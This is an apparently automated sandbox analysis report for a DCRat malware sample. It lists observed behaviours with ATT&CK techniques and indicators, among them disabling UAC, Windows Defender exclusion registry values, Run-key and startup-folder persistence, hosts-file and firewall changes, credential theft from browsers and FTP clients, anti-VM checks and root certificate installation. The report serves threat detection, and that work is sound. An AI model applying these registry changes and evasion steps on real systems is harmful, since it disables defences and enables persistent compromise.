dcrat | 02c6afc6297dce33b1a7b9db1be1002387d0744222471657c224b763b06e03c0

Bypass User Account Control

T1548.002

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Random.exe

Windows security bypass 2 TTPs 11 IoCs

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\RRePNPVOIf5J4S3T5KoTi5nD.exe = "0"	RRePNPVOIf5J4S3T5KoTi5nD.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	Random.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	YrpWQ8hS3zHC70jtCtFVHNbD.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	YrpWQ8hS3zHC70jtCtFVHNbD.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	YrpWQ8hS3zHC70jtCtFVHNbD.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	YrpWQ8hS3zHC70jtCtFVHNbD.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\Random.exe = "0"	Random.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	YrpWQ8hS3zHC70jtCtFVHNbD.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	YrpWQ8hS3zHC70jtCtFVHNbD.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\YrpWQ8hS3zHC70jtCtFVHNbD.exe = "0"	YrpWQ8hS3zHC70jtCtFVHNbD.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\d21cbe21e38b385a41a68c5e6dd32f4c.exe = "0"	d21cbe21e38b385a41a68c5e6dd32f4c.exe

Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	latestX.exe
File created	C:\Windows\System32\drivers\etc\hosts	updater.exe

Modifies Windows Firewall 1 TTPs 3 IoCs

evasion

Windows Service

T1543.003

pid	Process
2496	netsh.exe
404	netsh.exe
5028	netsh.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Drops startup file 7 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sZnQBbxWnbm1TsXTKIN4wcL7.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WsslqemjK1tin63FPnNfufRV.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EecAZ6NLQmSQmVjPeQljnl4w.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fionS0u8FXIMlwc52HDfv9gX.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\n6fLrmWhRZk1LkZSPnDRabss.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xoWJrtCZGjrnIaOH09KHfNsN.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eqWyrmNbJazdkiHfhlsjbquW.bat	CasPol.exe

Executes dropped EXE 31 IoCs

pid	Process
2392	InstallSetup5.exe
3920	toolspub2.exe
3296	d21cbe21e38b385a41a68c5e6dd32f4c.exe
4544	Random.exe
4436	Broom.exe
348	latestX.exe
2256	toolspub2.exe
4440	6vO7kiaovr3bKEveLKwqVWkW.exe
3796	h29nA186woMosEfeurfG9Ftj.exe
4540	RRePNPVOIf5J4S3T5KoTi5nD.exe
488	YrpWQ8hS3zHC70jtCtFVHNbD.exe
4008	h29nA186woMosEfeurfG9Ftj.tmp
4480	a3AqhnOM26HOLUbeJBrM7Cj8.exe
2708	a3AqhnOM26HOLUbeJBrM7Cj8.exe
2136	a3AqhnOM26HOLUbeJBrM7Cj8.exe
2352	a3AqhnOM26HOLUbeJBrM7Cj8.exe
1808	a3AqhnOM26HOLUbeJBrM7Cj8.exe
2896	YrpWQ8hS3zHC70jtCtFVHNbD.exe
4016	RRePNPVOIf5J4S3T5KoTi5nD.exe
4468	d21cbe21e38b385a41a68c5e6dd32f4c.exe
4420	updater.exe
4100	Assistant_103.0.4928.25_Setup.exe_sfx.exe
3752	assistant_installer.exe
5108	assistant_installer.exe
2304	ifsubgf
3280	csrss.exe
1300	injector.exe
368	windefender.exe
3468	windefender.exe
1636	ifsubgf
1796	f801950a962ddba14caaa44bf084b55c.exe

Loads dropped DLL 12 IoCs

pid	Process
4480	a3AqhnOM26HOLUbeJBrM7Cj8.exe
2708	a3AqhnOM26HOLUbeJBrM7Cj8.exe
4008	h29nA186woMosEfeurfG9Ftj.tmp
4008	h29nA186woMosEfeurfG9Ftj.tmp
4008	h29nA186woMosEfeurfG9Ftj.tmp
2136	a3AqhnOM26HOLUbeJBrM7Cj8.exe
2352	a3AqhnOM26HOLUbeJBrM7Cj8.exe
1808	a3AqhnOM26HOLUbeJBrM7Cj8.exe
3752	assistant_installer.exe
3752	assistant_installer.exe
5108	assistant_installer.exe
5108	assistant_installer.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 13 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000600000001abce-117.dat	upx
behavioral2/files/0x000600000001abce-133.dat	upx
behavioral2/files/0x000600000001abce-131.dat	upx
behavioral2/memory/4480-153-0x0000000000A10000-0x0000000000F38000-memory.dmp	upx
behavioral2/memory/2708-159-0x0000000000A10000-0x0000000000F38000-memory.dmp	upx
behavioral2/memory/2136-187-0x0000000000BF0000-0x0000000001118000-memory.dmp	upx
behavioral2/memory/2136-184-0x0000000000BF0000-0x0000000001118000-memory.dmp	upx
behavioral2/files/0x000600000001abce-189.dat	upx
behavioral2/memory/2352-195-0x0000000000A10000-0x0000000000F38000-memory.dmp	upx
behavioral2/files/0x000600000001abce-196.dat	upx
behavioral2/memory/1808-203-0x0000000000A10000-0x0000000000F38000-memory.dmp	upx
behavioral2/files/0x000600000001abe4-168.dat	upx
behavioral2/files/0x000600000001abce-163.dat	upx

Windows security modification 2 TTPs 12 IoCs

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	YrpWQ8hS3zHC70jtCtFVHNbD.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	YrpWQ8hS3zHC70jtCtFVHNbD.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	YrpWQ8hS3zHC70jtCtFVHNbD.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	YrpWQ8hS3zHC70jtCtFVHNbD.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\d21cbe21e38b385a41a68c5e6dd32f4c.exe = "0"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	Random.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	YrpWQ8hS3zHC70jtCtFVHNbD.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	YrpWQ8hS3zHC70jtCtFVHNbD.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\RRePNPVOIf5J4S3T5KoTi5nD.exe = "0"	RRePNPVOIf5J4S3T5KoTi5nD.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions	Random.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\Random.exe = "0"	Random.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\YrpWQ8hS3zHC70jtCtFVHNbD.exe = "0"	YrpWQ8hS3zHC70jtCtFVHNbD.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	RRePNPVOIf5J4S3T5KoTi5nD.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	YrpWQ8hS3zHC70jtCtFVHNbD.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Random.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Random.exe

Enumerates connected drives 3 TTPs 4 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\D:	a3AqhnOM26HOLUbeJBrM7Cj8.exe
File opened (read-only)	\??\F:	a3AqhnOM26HOLUbeJBrM7Cj8.exe
File opened (read-only)	\??\D:	a3AqhnOM26HOLUbeJBrM7Cj8.exe
File opened (read-only)	\??\F:	a3AqhnOM26HOLUbeJBrM7Cj8.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Manipulates WinMonFS driver. 1 IoCs

Roottkits write to WinMonFS to hide directories/files from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 21 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	Conhost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	Conhost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	Conhost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	Conhost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 4544 set thread context of 4712	4544	Random.exe	78
PID 3920 set thread context of 2256	3920	Process not Found	80
PID 4420 set thread context of 4324	4420	updater.exe	185
PID 4420 set thread context of 3568	4420	updater.exe	186
PID 2304 set thread context of 1636	2304	ifsubgf	199

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 3 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	RRePNPVOIf5J4S3T5KoTi5nD.exe
File opened (read-only)	\??\VBoxMiniRdrDN	YrpWQ8hS3zHC70jtCtFVHNbD.exe
File opened (read-only)	\??\VBoxMiniRdrDN	d21cbe21e38b385a41a68c5e6dd32f4c.exe

Drops file in Program Files directory 9 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Common Files\GreenTV\is-U5UVV.tmp	h29nA186woMosEfeurfG9Ftj.tmp
File created	C:\Program Files (x86)\Common Files\GreenTV\is-6AQ43.tmp	h29nA186woMosEfeurfG9Ftj.tmp
File created	C:\Program Files (x86)\Common Files\GreenTV\is-J0GL5.tmp	h29nA186woMosEfeurfG9Ftj.tmp
File created	C:\Program Files (x86)\Common Files\GreenTV\is-35QSN.tmp	h29nA186woMosEfeurfG9Ftj.tmp
File created	C:\Program Files (x86)\Common Files\GreenTV\is-G0GMR.tmp	h29nA186woMosEfeurfG9Ftj.tmp
File created	C:\Program Files\Google\Chrome\updater.exe	latestX.exe
File created	C:\Program Files (x86)\Common Files\GreenTV\unins000.dat	h29nA186woMosEfeurfG9Ftj.tmp
File created	C:\Program Files (x86)\Common Files\GreenTV\is-L3AHT.tmp	h29nA186woMosEfeurfG9Ftj.tmp
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe

Drops file in Windows directory 8 IoCs

description	ioc	Process
File created	C:\Windows\rss\csrss.exe	d21cbe21e38b385a41a68c5e6dd32f4c.exe
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\rss	YrpWQ8hS3zHC70jtCtFVHNbD.exe
File opened for modification	C:\Windows\rss	RRePNPVOIf5J4S3T5KoTi5nD.exe
File created	C:\Windows\rss\csrss.exe	RRePNPVOIf5J4S3T5KoTi5nD.exe
File created	C:\Windows\rss\csrss.exe	YrpWQ8hS3zHC70jtCtFVHNbD.exe
File opened for modification	C:\Windows\rss	d21cbe21e38b385a41a68c5e6dd32f4c.exe

Launches sc.exe 11 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1300	sc.exe
3456	sc.exe
2704	sc.exe
2372	sc.exe
4520	sc.exe
2144	sc.exe
2100	sc.exe
4500	sc.exe
4112	sc.exe
1760	sc.exe
4456	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ifsubgf
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ifsubgf
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ifsubgf

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	6vO7kiaovr3bKEveLKwqVWkW.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	6vO7kiaovr3bKEveLKwqVWkW.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
2496	schtasks.exe
1744	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4600	timeout.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"	YrpWQ8hS3zHC70jtCtFVHNbD.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	Conhost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-571 = "China Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time"	RRePNPVOIf5J4S3T5KoTi5nD.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time"	YrpWQ8hS3zHC70jtCtFVHNbD.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time"	RRePNPVOIf5J4S3T5KoTi5nD.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2511 = "Lord Howe Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	YrpWQ8hS3zHC70jtCtFVHNbD.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	Conhost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2842 = "Saratov Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time"	RRePNPVOIf5J4S3T5KoTi5nD.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-431 = "Iran Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time"	YrpWQ8hS3zHC70jtCtFVHNbD.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1871 = "Russia TZ 7 Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-962 = "Paraguay Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	Conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	Conhost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time"	RRePNPVOIf5J4S3T5KoTi5nD.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time"	YrpWQ8hS3zHC70jtCtFVHNbD.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\System\CurrentControlSet\Control	schtasks.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time"	YrpWQ8hS3zHC70jtCtFVHNbD.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-621 = "Korea Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-351 = "FLE Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time"	RRePNPVOIf5J4S3T5KoTi5nD.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time"	YrpWQ8hS3zHC70jtCtFVHNbD.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time"	YrpWQ8hS3zHC70jtCtFVHNbD.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	Conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	explorer.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-372 = "Jerusalem Standard Time"	windefender.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4	a3AqhnOM26HOLUbeJBrM7Cj8.exe
